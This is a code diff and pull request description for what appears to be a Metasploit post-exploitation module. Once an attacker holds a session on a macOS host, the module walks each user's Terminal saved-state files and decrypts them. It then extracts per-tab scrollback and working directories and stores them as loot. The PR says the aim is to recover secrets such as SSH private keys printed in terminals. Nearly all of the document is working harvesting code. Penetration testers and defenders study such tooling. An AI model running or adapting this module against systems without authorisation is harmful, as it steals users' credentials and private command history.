     _unk1, class_name_size = buf.unpack('NN')
-    offset = 8
-    offset += class_name_size
+    offset = 8 + class_name_size
+    raise BplistParser::ParseError, 'Truncated window envelope key' if offset > buf.bytesize
+    return nil unless buf[8, class_name_size] == '_NSWindow'
+
+    raise WindowEnvelopeError, 'Truncated window envelope fields' if offset + 8 > buf.bytesize
+
     magic = buf[offset, 4]
     offset += 4
-    return nil unless magic == 'rchv'
+    raise WindowEnvelopeError, 'Invalid window envelope tag' unless magic == 'rchv'
 
     plist_size = buf[offset, 4].unpack1('N')
     offset += 4
+    raise WindowEnvelopeError, 'Truncated window envelope plist' if plist_size > buf.bytesize - offset
+
     buf[offset, plist_size]
   end
 
   # Parses one NSCR window state blob, finds its decryption key in windows_meta,
   # decrypts it, and returns [size, window_meta, inner_plist_bytes].
+  # Returns [size, window_meta, nil, error] for a recognized but malformed _NSWindow envelope.
   # Returns [size, nil, nil] if the window metadata is missing.
   # Returns nil if the magic/version is invalid.
   def decrypt_window(windows_meta, buf)
@@ -267,22 +320,123 @@ class MetasploitModule < Msf::Post
     key = window['NSDataKey']
     plaintext = aes128_cbc_decrypt(key, ciphertext)
     plist_bytes = parse_window_header(plaintext)
+    vprint_status("  Skipping non-_NSWindow record for window ID #{window_id}") unless plist_bytes
 
     [size, window, plist_bytes]
+  rescue WindowEnvelopeError => e
+    [size, window, nil, e.message]
+  rescue OpenSSL::Cipher::CipherError, ArgumentError, BplistParser::ParseError => e
+    vprint_warning("  Failed to decrypt record for window ID #{window_id}: #{e}")
+    [size, nil, nil]
   end
 
-  # Extracts terminal scrollback content from a parsed NSKeyedArchiver plist.
-  # $objects[33+] holds the terminal line strings per the SavedState format.
-  # Terminal lines are stored as NSData (binary, ASCII_8BIT encoding).
-  # Metadata strings (window geometry, class names, etc.) are NSString (UTF-8).
-  def extract_terminal_content(state)
-    objects = state['$objects']
-    return nil if objects.nil? || objects.length <= 32
+  # NSCR1000 records include their 16-byte header in the total length.
+  # Select the last _NSWindow record for each ID before parsing any archives.
+  # Retain malformed candidates until selection ends so older state cannot become current.
+  def latest_window_records(windows_meta, data)
+    records = {}
+    pos = 0
+    while pos < data.bytesize
+      if data.bytesize - pos < 16
+        print_warning("  Torn final record header at offset #{pos}; stopping")
+        break
+      end
+      unless data[pos, 8] == 'NSCR1000'
+        print_warning("  Invalid record header at offset #{pos}; stopping")
+        break
+      end
 
-    content = objects[33..].select { |o| o.is_a?(String) && o.encoding == ::Encoding::ASCII_8BIT }
-                           .map { |s| s.encode('UTF-8', 'ASCII-8BIT', invalid: :replace, undef: :replace) }
-                           .join
-    content.sub(/(\[Process completed\]\n).*/m, '\1')
+      window_id, size = data[pos + 8, 8].unpack('NN')
+      if size <= 16
+        print_warning("  Invalid record length #{size} at offset #{pos}; stopping")
+        break
+      end
+      if size > data.bytesize - pos
+        print_warning("  Torn final record for window ID #{window_id} at offset #{pos}; stopping")
+        break
+      end
+
+      _size, window, plist_bytes, error = decrypt_window(windows_meta, data[pos, size])
+      if window && (plist_bytes || error)
+        previous = records[window_id]
+        if previous
+          vprint_status("  Window ID #{window_id}: choosing _NSWindow record at offset #{pos}; skipping earlier record at offset #{previous[:offset]}")
+        end
+        records[window_id] = { window: window, plist_bytes: plist_bytes, offset: pos, error: error }
+      end
+      pos += size
+    end
+    records.delete_if do |window_id, record|
+      next false unless record[:error]
+
+      print_warning("  Window ID #{window_id}: newest _NSWindow state at offset #{record[:offset]} was malformed (#{record[:error]}); skipping window")
+      true
+    end
+  end
+
+  # Resolve only typed UIDs through $objects; ordinary integers are values.
+  def resolve_archive_value(value, objects, resolved = {})
+    case value
+    when BplistParser::UID
+      index = value.value
+      return nil if index.zero?
+      raise BplistParser::ParseError, "Invalid archive UID #{index}" unless index.between?(0, objects.length - 1)
+      return resolved[index] if resolved.key?(index)
+
+      resolved[index] = nil # Break cycles in the archived object graph.
+      resolved[index] = resolve_archive_value(objects[index], objects, resolved)
+    when Array
+      value.map { |entry| resolve_archive_value(entry, objects, resolved) }
+    when Hash
+      if value.key?('NS.keys')
+        keys = resolve_archive_value(value['NS.keys'], objects, resolved)
+        values = resolve_archive_value(value['NS.objects'], objects, resolved)
+        unless keys.is_a?(Array) && values.is_a?(Array) && keys.length == values.length
+          raise BplistParser::ParseError, 'Invalid archived NSDictionary'
+        end
+
+        keys.zip(values).to_h
+      elsif value.key?('NS.objects')
+        resolve_archive_value(value['NS.objects'], objects, resolved)
+      elsif value.key?('NS.string')
+        resolve_archive_value(value['NS.string'], objects, resolved)
+      elsif value.key?('NS.data')
+        resolve_archive_value(value['NS.data'], objects, resolved)
+      else
+        value.reject { |key, _entry| key == '$class' }.transform_values { |entry| resolve_archive_value(entry, objects, resolved) }
+      end
+    else
+      value
+    end
+  end
+
+  # Follow $top -> TTWindowState -> Window Settings, preserving tab boundaries.
+  def extract_terminal_tabs(state)
+    objects = state['$objects']
+    return [] unless objects.is_a?(Array)
+
+    top = resolve_archive_value(state['$top'], objects)
+    return [] unless top.is_a?(Hash)
+
+    # Archives may put the TTWindowState dictionary beneath the standard root key.
+    root = top['root'] || top
+    return [] unless root.is_a?(Hash)
+
+    window_state = root['TTWindowState']
+    return [] unless window_state.is_a?(Hash) && window_state['Window Settings'].is_a?(Array)
+
+    window_state['Window Settings'].each_with_object([]) do |tab, tabs|
+      next unless tab.is_a?(Hash)
+
+      rows = tab['Tab Contents v2']
+      next unless rows.is_a?(Array)
+
+      # Odd entries are 16-byte attribute runs, even when a row is also 16 bytes.
+      content = rows.each_slice(2).map do |row, _attributes|
+        row.is_a?(String) ? row.dup.force_encoding('UTF-8').scrub : ''
+      end.join
+      tabs << { content: content, working_directory: tab['Tab Working Directory URL String'] }
+    end
   end
 
   def process_saved_state(path)
@@ -298,30 +452,21 @@ class MetasploitModule < Msf::Post
 
     windows_meta = parse_binary_plist(read_file(windows_plist))
     data = read_file(data_file).b
-    pos = 0
-
-    while pos <= data.length - 0x10
-      break unless data[pos, 4] == 'NSCR'
-
-      result = decrypt_window(windows_meta, data[pos..])
-      break if result.nil?
-
-      size, window, plist_bytes = result
-      break if size.nil? || size <= 0x10
-
-      pos += size
-      next if plist_bytes.nil? || window.nil?
-
+    latest_window_records(windows_meta, data).each do |window_id, record|
+      window = record[:window]
       title = window.fetch('NSTitle', '(no title)')
       vprint_status("  Window: #{title}")
 
       begin
-        state = parse_binary_plist(plist_bytes)
+        state = parse_binary_plist(record[:plist_bytes])
         state_json = JSON.pretty_generate(plist_to_json_value(state))
+        tabs = extract_terminal_tabs(state)
       rescue BplistParser::ParseError, JSON::GeneratorError => e
-        vprint_error("  Failed to process window plist: #{e}")
+        print_warning("  Window ID #{window_id}: newest _NSWindow state at offset #{record[:offset]} was malformed (#{e}); skipping window")
         next
       end
+
+      vprint_status("  Using last _NSWindow record for window ID #{window_id} at offset #{record[:offset]}")
 
       loot_json = store_loot(
         'osx.terminal.window.json',
@@ -333,21 +478,25 @@ class MetasploitModule < Msf::Post
       )
       vprint_status("  Stored window state JSON to: #{loot_json}")
 
-      content = extract_terminal_content(state)
-      next if content.nil? || content.empty?
+      tabs.each_with_index do |tab, index|
+        content = tab[:content]
+        next if content.empty?
 
-      print_good("  Recovered terminal history for window: #{title}")
-      print_status(content)
+        print_good("  Recovered terminal history for window: #{title}, tab #{index + 1}")
+        directory = tab[:working_directory]
+        print_status("  Working directory: #{directory}") if directory
+        print_status(content)
 
-      loot = store_loot(
-        'osx.terminal.history',
-        'text/plain',
-        session,
-        content,
-        'terminal_history.txt',
-        "macOS terminal history - #{title}"
-      )
-      print_good("  Stored to: #{loot}")
+        loot = store_loot(
+          'osx.terminal.history',
+          'text/plain',
+          session,
+          content,
+          'terminal_history.txt',
+          "macOS terminal history - #{title}, tab #{index + 1} (#{directory})"
+        )
+        print_good("  Stored to: #{loot}")
+      end
     end
   rescue BplistParser::ParseError => e
     print_error("Failed to parse #{windows_plist}: #{e}")
@@ -364,6 +513,7 @@ class MetasploitModule < Msf::Post
       SAVED_STATE_APPS.each do |app|
         process_saved_state("/Users/#{user}/Library/Saved Application State/#{app}")
       end
+      terminal_container_paths(user).each { |path| process_saved_state(path) }
     end
   end
 end

--- a/modules/post/osx/gather/terminal_save_state.rb
+++ b/modules/post/osx/gather/terminal_save_state.rb
@@ -3,9 +3,12 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'base64'
 require 'openssl'
 require 'json'
+require 'rexml/document'
 require 'shellwords'
+require 'time'
 
 # Binary plist parser ported from bplist.py by Willi Ballenthin
 # https://gist.github.com/williballenthin/ab23abd5eec5bf5a272bfcfb2342ec04
@@ -199,6 +202,46 @@ class MetasploitModule < Msf::Post
     BplistParser.new(data).parse
   end
 
+  # Metadata plists can be XML or binary; decrypted keyed archives remain binary.
+  def parse_plist(data)
+    return parse_binary_plist(data) if data.start_with?('bplist00')
+    raise BplistParser::ParseError, 'Unrecognized plist format' unless data.start_with?('<?xml')
+
+    root = REXML::Document.new(data).root
+    unless root && root.name == 'plist' && root.elements.size == 1
+      raise BplistParser::ParseError, 'Invalid XML plist root'
+    end
+
+    parse_xml_plist_value(root.elements[1])
+  rescue REXML::ParseException, ArgumentError
+    raise BplistParser::ParseError, 'Invalid XML plist'
+  end
+
+  def parse_xml_plist_value(element)
+    case element.name
+    when 'array'
+      element.elements.map { |entry| parse_xml_plist_value(entry) }
+    when 'dict'
+      entries = element.elements.to_a
+      raise BplistParser::ParseError, 'Invalid XML plist dictionary' unless entries.length.even?
+
+      entries.each_slice(2).each_with_object({}) do |(key, value), result|
+        raise BplistParser::ParseError, 'Invalid XML plist dictionary key' unless key.name == 'key'
+
+        result[key.text.to_s] = parse_xml_plist_value(value)
+      end
+    when 'string' then element.text.to_s
+    when 'data' then Base64.strict_decode64(element.text.to_s.delete(" \t\r\n"))
+    when 'integer' then Integer(element.text.to_s, 10)
+    when 'real' then Float(element.text.to_s)
+    when 'date' then Time.iso8601(element.text.to_s)
+    when 'true' then true
+    when 'false' then false
+    else
+      raise BplistParser::ParseError, 'Unsupported XML plist value'
+    end
+  end
+
   def terminal_container_paths(user)
     paths = []
     containers = "/Users/#{user}/Library/Daemon Containers"
@@ -214,7 +257,7 @@ class MetasploitModule < Msf::Post
       next unless file?(mapping_file)
 
       begin
-        mapping = parse_binary_plist(read_file(mapping_file))
+        mapping = parse_plist(read_file(mapping_file))
         next unless mapping.is_a?(Array)
 
         # The flat array alternates an application dictionary and its saved-state UUID.
@@ -433,8 +476,10 @@ class MetasploitModule < Msf::Post
 
       # Odd entries are 16-byte attribute runs, even when a row is also 16 bytes.
       content = rows.each_slice(2).map do |row, _attributes|
-        row.is_a?(String) ? row.dup.force_encoding('UTF-8').scrub : ''
-      end.join
+        # Trim only trailing ASCII spaces, preserving embedded LFs and other whitespace.
+        row.is_a?(String) ? row.dup.force_encoding('UTF-8').scrub.reverse.sub(/\A +/, '').reverse : ''
+      end.join("\n")
+      content << "\n" unless rows.empty? # The reference terminates every row, including the last.
       tabs << { content: content, working_directory: tab['Tab Working Directory URL String'] }
     end
   end
@@ -450,7 +495,7 @@ class MetasploitModule < Msf::Post
 
     print_status("Processing: #{path}")
 
-    windows_meta = parse_binary_plist(read_file(windows_plist))
+    windows_meta = parse_plist(read_file(windows_plist))
     data = read_file(data_file).b
     latest_window_records(windows_meta, data).each do |window_id, record|
       window = record[:window]


### PR DESCRIPTION
Fixes #12440

A long time ago (2019) in a galaxy far far away I heard a talk by @williballenthin and submitted #12688 . Unfortunately it was python based, python post modules didn't have everything I needed.

This PR is a post module for OSX 10.7 (2011) – 12 (~2022) that enumerates, and decrypts terminal savedstate files. These files are a complete input/output of terminals, and will hopefully include things like `cat ~/.ssh/id_rsa` or other useful tidbits.

Credit where credit is due, @williballenthin did all the research, coding, and responded to all my questions (physical and virtual). So big +1 to him being awesome (years ago). Since then the complete conversion from python to ruby is Claude at work. Thoughts on crediting claude as an author?

## How to test this PR

1. on MacOS open a terminal and type some stuff. Then type `exit`
2. Start msfconsole
3. Get a shell on a vulnerable MacOS
4. Do: `use post/osx/gather/terminal_save_state`
5. Do: `set session [#]`
6. Do: `run`
7. You should get decrypted terminal sessions